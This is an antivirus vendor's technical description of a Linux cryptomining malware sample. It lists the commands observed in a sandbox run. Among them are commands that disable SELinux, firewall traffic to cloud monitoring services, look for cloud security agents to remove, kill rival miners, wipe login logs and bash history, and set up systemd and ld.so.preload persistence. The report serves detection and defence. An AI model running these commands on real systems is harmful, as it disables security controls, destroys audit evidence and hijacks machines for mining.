Linux.Siggen.6704

Added to the Dr.Web virus database: 2024-03-08

Virus description added:

Technical Information

Malicious functions:
Manages services:
  • ['systemctl', 'start', 'system-kernel.timer']
  • ['systemctl', 'status', 'firewalld']
  • ['systemctl', 'enable', 'system-kernel.timer']
Launches processes:
  • /bin/sh -c setenforce 0
  • /bin/sh /usr/bin/which ufw
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 10.148.188.202 -j DROP
  • grep f2poll
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 10.148.188.201 -j DROP
  • grep -v grep
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 11.177.125.116 -j DROP
  • /bin/sh -c command -v systemctl
  • ls /usr/local/aegis/aegis_update
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 10.148.188.201 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 11.149.252.57 -j DROP
  • ps -ef | grep -v grep | grep xmrig | awk \x27{print $2}\x27 | xargs kill -9
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 11.149.252.62 -j DROP
  • ls /usr/local/qcloud/stargate/admin/uninstall.sh
  • ls /var/lib/qcloud/YunJing/uninst.sh
  • /bin/sh -c ls /usr/local/qcloud/monitor/barad/admin/uninstall.sh || ls /usr/local/qcloud/stargate/admin/uninstall.sh
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 120.232.65.223 -j DROP
  • kill -9
  • ls /usr/local/aegis/aegis_client
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 157.148.45.20 -j DROP
  • /bin/sh -c echo SELINUX=disabled > /etc/sysconfig/selinux
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 11.149.252.51 -j DROP
  • /tmp/.migo_worker/.migo_worker --config /tmp/.migo_worker/.migo.json
  • /usr/bin/mawk awk {print $2}
  • grep -v ^root$
  • grep xmrig
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 120.232.65.223 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 11.177.125.116 -j DROP
  • xargs kill -9
  • ls /usr/local/cloudmonitor/cloudmonitorCtl.sh
  • ps -ef | grep -v grep | grep f2poll | awk \x27{print $2}\x27 | xargs kill -9
  • /bin/sh -c ls /usr/local/qcloud/YunJing/uninst.sh || ls /var/lib/qcloud/YunJing/uninst.sh
  • bash -c for user in $(cut -d: -f1 /etc/passwd | grep -v \x27^root$\x27); do -e \x22$(eval echo ~$user)/.bash_history\x22 && > \x22$(eval echo ~$user)/.bash_history\x22; done
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 11.177.124.86 -j DROP
  • cut -d: -f1 /etc/passwd
  • ls /usr/local/qcloud/monitor/barad/admin/uninstall.sh
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 169.254.0.55 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 11.177.124.86 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 11.149.252.57 -j DROP
  • bash -c systemctl start system-kernel.timer && systemctl enable system-kernel.timer
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 169.254.0.55 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 11.149.252.62 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 157.148.45.20 -j DROP
  • bash -c echo -n > /var/log/btmp && echo -n > /var/log/lastlog && echo -n > /var/log/wtmp && echo -n > /var/log/utmp && echo -n > /var/log/secure && echo -n > /var/log/messages
  • /bin/sh -c command -v setenforce
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 11.149.252.51 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 10.148.188.202 -j DROP
  • ps -ef
  • ls /usr/local/qcloud/YunJing/uninst.sh
  • /usr/sbin/xtables-nft-multi iptables -A OUTPUT -d 183.2.143.163 -j DROP
  • /usr/sbin/xtables-nft-multi iptables -C OUTPUT -d 183.2.143.163 -j DROP
Performs operations with the file system:
Modifies file access rights:
  • /tmp/.migo
  • /tmp/.migo_worker/.migo_worker
Creates folders:
  • /tmp/.migo_worker
Creates or modifies files:
  • /tmp/.migo_running
  • /etc/security/limits.conf
  • /etc/sysctl.d/mysql.conf
  • /tmp/.migo_worker/.worker.tar.gz
  • /tmp/.migo
  • /etc/systemd/system/system-kernel.service
  • /etc/systemd/system/system-kernel.timer
  • /usr/bin/fakeroot-sysv
  • /etc/sysconfig/selinux
  • /usr/local/lib/libsystemd.so
  • /etc/ld.so.preload
  • /var/log/btmp
  • /var/log/lastlog
  • /var/log/wtmp
  • /var/log/utmp
  • /var/log/secure
  • /var/log/messages
  • /home/user/.bash_history
  • /tmp/.migo_worker/config.json
  • /tmp/.migo_worker/xmrig
  • /tmp/.migo_worker/SHA256SUMS
  • /tmp/.migo_worker/.migo.json
  • /tmp/.migo_worker_running
  • /etc/hosts
  • /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
Network activity:
Establishes connection:
  • 8.#.8.8:53
  • 14#.##.121.3:443
  • 18#.##9.111.133:9
  • 18#.##9.108.133:9
  • 18#.##9.109.133:9
  • 18#.##9.110.133:9
  • 18#.##9.111.133:443
  • 51.##.217.80:65535
  • [2#######0:800:2d50::]:65535
  • 51.##.217.80:9999
DNS ASK:
  • xm##ool.eu
Sends data to the following servers:
  • 8.#.8.8:53
  • 14#.##.121.3:443
  • 18#.##9.111.133:443
  • 51.##.217.80:9999
Receives data from the following servers:
  • 8.#.8.8:53
  • 14#.##.121.3:443
  • 18#.##9.111.133:443
  • 51.##.217.80:9999
Other:
Collects OS information
Collects CPU information
Collects RAM information
Collects information about network activity

Curing recommendations

Linux
After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.
